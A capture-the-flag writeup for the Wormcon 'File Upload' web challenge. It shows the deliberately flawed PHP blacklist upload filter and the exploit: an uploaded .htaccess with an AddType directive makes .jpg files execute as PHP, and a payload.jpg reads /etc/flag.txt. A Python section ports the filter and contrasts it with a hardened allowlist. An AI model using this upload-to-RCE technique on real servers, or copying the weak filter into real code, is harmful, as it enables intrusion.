Web: File Upload (Wormcon 0x01)

x3rz
3 min read · Aug 30, 2021

Description: You know how to upload files?

Note: Flag is located in etc directory

Do not try to upload a reverse shell on web challenges; there is no such requirement.

Author: x3rz

Welcome everyone to the File Upload web challenge writeup. I will try to explain it from a CTF player's perspective.

Visiting the provided URL presents a plain file upload form:

index.php

As a basic web CTF strategy we first looked for robots.txt, which is not present on this server.

After a number of tries it becomes clear that .jpg (and most other formats) upload fine, but every extension that would give us a shell, or otherwise let us read files on the server, is rejected.

Another item on the modern checklist is "/.well-known/security.txt". Challenge authors like to hide hints there because the file is not yet widely known in the community; it is a fairly new standard (since published as RFC 9116). You can read more about it here.

Checking /.well-known/security.txt shows an entry '/backup.zip'; downloading it reveals the source code of index.php.

Only the PHP portion of the file is shown here, since the HTML is not relevant to the challenge.

<?php
if (isset($_POST['submit'])) {
    $target_dir = "uploads/";
    // The server-side name is taken straight from the client-supplied filename
    $name = $target_dir . basename($_FILES['file']['name']);
    // Extension = everything after the LAST dot, lowercased before the check
    $ext = strtolower(pathinfo($name)['extension']);
    $target_file = $target_dir . basename($_FILES['file']['name']);
    // var_dump($ext);
    $uploadOk = 1;
    // Extension blacklist. The mixed-case entries are redundant because
    // $ext is already lowercased; what matters is which names are missing.
    $blacklist = array("php","php5","php4","php3","php2","php1","html","htm","phtml","pht",
                       "pHp","pHp5","pHp4","pHp3","pHp2","pHp1","Html","Htm","pHtml",
                       "jsp","jspa","jspx","jsw","jsv","jspf","jtml",
                       "jSp","jSpx","jSpa","jSw","jSv","jSpf","jHtml",
                       "asp","aspx","asa","asax","ascx","ashx","asmx","cer",
                       "aSp","aSpx","aSa","aSax","aScx","aShx","aSmx","cEr",
                       "sWf","swf");
    if (!in_array($ext, $blacklist)) {
        // Anything not on the list is written into uploads/ under its original name
        if (move_uploaded_file($_FILES['file']['tmp_name'], $name)) {
            echo "<script>alert('uploaded!!')</script>";
        }
    } else {
        echo "<script>alert('not allowed!!')</script>";
    }
}
?>

So this is a large blacklist that blocks almost every extension that could give us a shell on the server. Note that the check is purely on the extension after the last dot, and the file is stored under the name we supply.

Have you noticed anything? The blacklist does not block a .htaccess file: pathinfo() reports its extension as "htaccess", which is not on the list. The server is Apache, so it is quite possible that per-directory .htaccess files are honoured in the upload directory.

Let's test that assumption by requesting the upload directory directly 😜 (just a test case)

Check by accessing the upload directory

So we can reasonably assume the server honours .htaccess files in that directory, which narrows down the challenge objective.

A quick search for .htaccess upload attacks turns up the classic technique: if Apache's AllowOverride for the upload directory permits FileInfo directives (AddType belongs to that class), an uploaded .htaccess can add a handler mapping and give the attacker remote code execution. The rule is:

AddType application/x-httpd-php .jpg

On a mod_php setup this directive makes Apache run every .jpg in that directory (and its subdirectories) through the PHP interpreter, so our "image" is executed as a PHP script.

Isn't this cool? 😉
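To make the filter gap concrete, here is an added example (my own code, not part of the original writeup or the challenge) that ports the challenge's blacklist check to Python, shows which names slip past it, and puts a hardened allowlist check next to it. The blacklist is copied from the index.php above with the redundant mixed-case entries dropped; the magic-byte table, the rejection of dotfiles and the random storage name are my additions, and the `.phar` and `x.php.jpg` cases are constructed inputs.

```python
import os
import secrets
from typing import Optional

# Extension blacklist from the challenge's index.php. The PHP lowercases $ext
# before in_array(), so the "pHp"-style entries never add anything.
BLACKLIST = {
    "php", "php5", "php4", "php3", "php2", "php1", "html", "htm", "phtml", "pht",
    "jsp", "jspa", "jspx", "jsw", "jsv", "jspf", "jtml", "jhtml",
    "asp", "aspx", "asa", "asax", "ascx", "ashx", "asmx", "cer", "swf",
}


def php_extension(filename: str) -> str:
    """Mimic PHP's pathinfo($name)['extension'] on the basename.

    PHP takes everything after the LAST dot, so '.htaccess' yields
    'htaccess' and 'x.php.jpg' yields 'jpg'. A name with no dot has no
    extension (PHP returns null there; we return '').
    """
    base = os.path.basename(filename)
    if "." not in base:
        return ""
    return base.rsplit(".", 1)[1]


def blacklist_allows(filename: str) -> bool:
    """The challenge's check: allowed unless the lowercased extension is listed."""
    return php_extension(filename).lower() not in BLACKLIST


# Hardened variant (added here, not the challenge's code): allowlist of image
# types keyed to the magic bytes the file must start with.
ALLOWED = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def allowlist_check(filename: str, data: bytes) -> Optional[str]:
    """Return a safe server-side filename, or None to reject the upload.

    - allowlist instead of blacklist, so .htaccess, .phar, .phtml never qualify
    - dotfiles and names without an extension are rejected outright
    - the content must start with the magic bytes of the claimed type, so a
      .jpg consisting of '<?php ...' is rejected
    - the stored name is random; the client-supplied name never reaches disk

    A magic-byte check alone does not stop a real JPEG with PHP appended, so
    the upload directory must additionally never execute anything
    (AllowOverride None plus no PHP handler for that directory, or store the
    files outside the web root). That is an Apache-side setting, not PHP.
    """
    base = os.path.basename(filename)
    if not base or base.startswith(".") or "." not in base:
        return None
    ext = base.rsplit(".", 1)[1].lower()
    magic = ALLOWED.get(ext)
    if magic is None or not data.startswith(magic):
        return None
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    for name in (".htaccess", "payload.jpg", "shell.php", "shell.pHp",
                 "shell.phar", "x.php.jpg"):
        print(f"{name:12} blacklist allows: {blacklist_allows(name)}")
    print("allowlist .htaccess:", allowlist_check(".htaccess", b"AddType application/x-httpd-php .jpg"))
    print("allowlist php-in-jpg:", allowlist_check("payload.jpg", b"<?php phpinfo(); ?>"))
    print("allowlist real jpeg:", allowlist_check("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16))
```

Running it shows the two files the writeup relies on (`.htaccess` and `payload.jpg`) pass the blacklist, as does `.phar`, which the list also forgot; the allowlist version rejects all of them and only accepts a file that both claims to be and starts like an image.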

So enough information gathering, let's jump into the exploitation part.

Make a .htaccess file with content:

AddType application/x-httpd-php .jpg

Make a file named payload.jpg with content:

<?php phpinfo(); ?>

Now upload the .htaccess file first, then the .jpg file, and browse to uploads/payload.jpg. If the phpinfo() page renders, the handler mapping is in effect.

The phpinfo() output also lists disable_functions, and file_get_contents is not among them.

So the final payload.jpg is:

<?php echo file_get_contents('/etc/flag.txt');?>

Upload it and request it again, and this is how you read the flag stored at /etc/flag.txt.

Hope you enjoyed this challenge and learned something new 😉

If you have any query then do ping me on discord (x3rz#6901) or Twitter (x3rz0x00) or you can always find me on the Vulnfreak server.
